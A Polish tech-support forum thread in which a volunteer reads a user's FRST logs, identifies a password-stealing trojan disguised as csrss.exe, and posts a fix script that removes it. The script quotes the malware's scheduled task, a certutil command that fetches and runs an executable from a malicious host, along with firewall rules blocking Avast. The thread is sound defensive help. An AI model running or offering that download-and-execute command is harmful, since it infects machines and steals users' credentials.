Prowizoryczna Opublikowano 28 Sierpnia 2021 Zgłoś Udostępnij Opublikowano 28 Sierpnia 2021 Cześc, wczoraj wysypał mi sie antyvirus przy okazji jak pojawił mi sie Blue Screen. Od tamtej pory nie mogę uruchomić Avasta a po jego zainstalowaniu wyświetla mi sie komunikat: Załączam raporty Shortcut.txtFRST.txtAddition.txt Proszę o pomoc. Odnośnik do komentarza
Krzesimierz Opublikowano 28 Sierpnia 2021 Zgłoś Udostępnij Opublikowano 28 Sierpnia 2021 Cześć. Dobrze, że załączasz od razu logi. Jest trojan/wirus csrss kradnący hasła, m.in bankowe. Wirus pewnie uszkodził Avast i go blokuje. Do wykonania poniższe, w takiej kolejności jak napisane: Pobierz programy avastclear, a kolejno AdwCleaner i zostaw na później Uruchom system w trybie awaryjnym Odinstaluj Avast, Uruchom avastclear Kolejno Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [FloralWater] => C:\Windows\rss\csrss.exe [4647936 2021-08-27] () [Brak podpisu cyfrowego] <==== UWAGA HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA Task: {0B7F87F1-DAF5-4FA4-A084-F77005A096DA} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4647936 2021-08-27] () [Brak podpisu cyfrowego] <==== UWAGA Task: {65794ABA-9252-4BCC-8178-0511C9F883F0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\Adobe Acrobat Update Task" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\AutoPico Daily Restart" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\Driver Booster Scheduler" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(4): schtasks.exe -> /Change /TN "\Driver Booster SkipUAC (Kratex)" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(5): schtasks.exe -> /Change /TN "\Driver Booster Update" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineCore" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(7): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineUA" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(8): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE Task: {63782042-E067-4D79-9FA7-D726632F2BBB} - System32\Tasks\Avast Emergency Update => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe [4917528 2021-08-28] (Avast Software s.r.o. -> AVAST Software) Task: {65794ABA-9252-4BCC-8178-0511C9F883F0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {78A1C563-2319-4E9C-89BF-C1160DB39E21} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-08-28] (Avast Software s.r.o. -> Avast Software) Task: {5558CA42-2EFB-48C8-9303-3D86BBE7BEB8} - System32\Tasks\{F71ED945-6E64-4AEE-8156-3C0D05DBC94A} => C:\Program Files\Avast Software\Avast\AvastUI.exe [12773656 2021-08-28] (Avast Software s.r.o. -> AVAST Software) Task: {D97C04DB-D449-42F1-8E8B-66FFE6135F88} - System32\Tasks\{CBA2B0A4-A23C-4644-8AAB-C5134DF7C3D2} => C:\Program Files\Avast Software\Avast\AvastUI.exe [12773656 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu) <==== UWAGA R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2021-08-27] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] <==== UWAGA () [Brak podpisu cyfrowego] C:\Users\Kratex\AppData\Local\Temp\csrss\nupload05053.exe S3 aswbIDSAgent; C:\Program Files\Avast Software\Avast\aswidsagent.exe [8303184 2021-08-28] (Avast Software s.r.o. -> AVAST Software) S2 avast! Antivirus; C:\Program Files\Avast Software\Avast\AvastSvc.exe [630040 2021-08-28] (Avast Software s.r.o. -> AVAST Software) S2 avast! Tools; C:\Program Files\Avast Software\Avast\aswToolsSvc.exe [377624 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [35712 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [221584 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [367632 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [250384 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [99344 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [41344 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [184120 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [538464 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2021-08-28] (AVAST Software s.r.o. -> AVAST Software) R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [107840 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [82904 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851704 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [553496 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [215384 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [328560 2021-08-28] (Avast Software s.r.o. -> AVAST Software) HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Avast Software\Avast\AvLaunch.exe [124184 2021-08-28] (Avast Software s.r.o. -> AVAST Software) HKLM-x32\...\RunOnce: [PreRun] => C:\Program Files (x86)\Gigabyte\AppCenter\PreRun.exe [8192 2013-04-29] () [Brak podpisu cyfrowego] HKLM-x32\...\RunOnce: [AvRepair] => C:\Program Files\Avast Software\Avast\setup\instup.exe [3462472 2021-08-19] (Avast Software s.r.o. -> AVAST Software) FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] FirewallRules: [{9D0A2927-527B-4D20-B19A-9FB4C77FCCF3}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] FirewallRules: [{4519BF55-3D4B-4C02-A6C3-F362236FC976}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] FirewallRules: [{86A3D3B0-4A91-4BF4-AD94-4ABA76C12CB9}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] FirewallRules: [{8927EACB-141B-4788-B822-8C86962DBC17}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] FirewallRules: [{40FCE70D-CC76-4AED-9A4C-4F7E3FDADBDF}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) FirewallRules: [{136AA29A-40C2-4F49-88D7-303296BC48C0}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) FirewallRules: [{BA7E5C4C-001F-449A-8877-F28E4239A0CC}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) FirewallRules: [{4A5C4BAD-0259-4AC6-A1B5-08309E5FC47B}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) FirewallRules: [{FFA05444-AAE2-440C-B062-C25D2E667416}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) FirewallRules: [{5396D449-424C-4223-A779-6E2177679E90}] => (Block) C:\Program Files\Avast Software\Avast\AvastUI.exe (Avast Software s.r.o. -> AVAST Software) IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com IE trusted site: HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\webcompanion.com -> hxxp://webcompanion.com CustomCLSID: HKU\S-1-5-21-2441695171-927743616-401218213-1000_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-2441695171-927743616-401218213-1000_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-2441695171-927743616-401218213-1000_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Kratex\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll => Brak pliku ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> Brak pliku ContextMenuHandlers1: [AIMPClassic] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> Brak pliku ContextMenuHandlers4: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> Brak pliku ContextMenuHandlers4: [AIMPClassic] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Songbird Web Player\Songbird Web Player.lnk -> C:\Program Files (x86)\Songbird Web Player\songbird.exe (Brak pliku) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico\AutoPico.lnk -> C:\Program Files\KMSpico\AutoPico.exe (Brak pliku) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico\KMSpico.lnk -> C:\Program Files\KMSpico\KMSELDI.exe (Brak pliku) cdm: del /f C:\Users\Kratex\AppData\Local\Temp\csrss\nupload05053.exe cdm: del /f C:\Windows\rss\csrss.exe EmptyTemp: Zapisz zawartość notatnika. (Na klawiaturze naciśnij jednocześnie CTRL + S.) W FRST kliknij na Fix (NAPRAW). Program będzie potrzebował restartu systemu, pozwól mu. Uruchom AdwCleaner, uruchom skan i wyczyść pozostałości, które wyszuka. Napisz jaka jest sytuacja i wklej świeże logi FRST. Jeśli w kolejnych logach wszystko będzie ok, będzie można zainstalować Avast ponownie, najlepiej ściągnąć instalator na nowo. Odnośnik do komentarza
Prowizoryczna Opublikowano 28 Sierpnia 2021 Autor Zgłoś Udostępnij Opublikowano 28 Sierpnia 2021 Usunełam pozostałości po skanowaniu przez AdwCleaner - pokazał faktycznie mi jakiegoś trojana. Shortcut.txt FRST.txt Addition.txt Odnośnik do komentarza
Krzesimierz Opublikowano 28 Sierpnia 2021 Zgłoś Udostępnij Opublikowano 28 Sierpnia 2021 Wszystko się usunęło tak jak należy. Logi wyglądają dobrze. Radzę także odinstalować Adobe Flash Player, ponieważ jest dziurawy a więc i niebezpieczny. https://helpx.adobe.com/pl/flash-player/kb/uninstall-flash-player-windows.html Odnośnik do komentarza
Prowizoryczna Opublikowano 28 Sierpnia 2021 Autor Zgłoś Udostępnij Opublikowano 28 Sierpnia 2021 Wszystko hula, dziękuję bardzo! :) Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się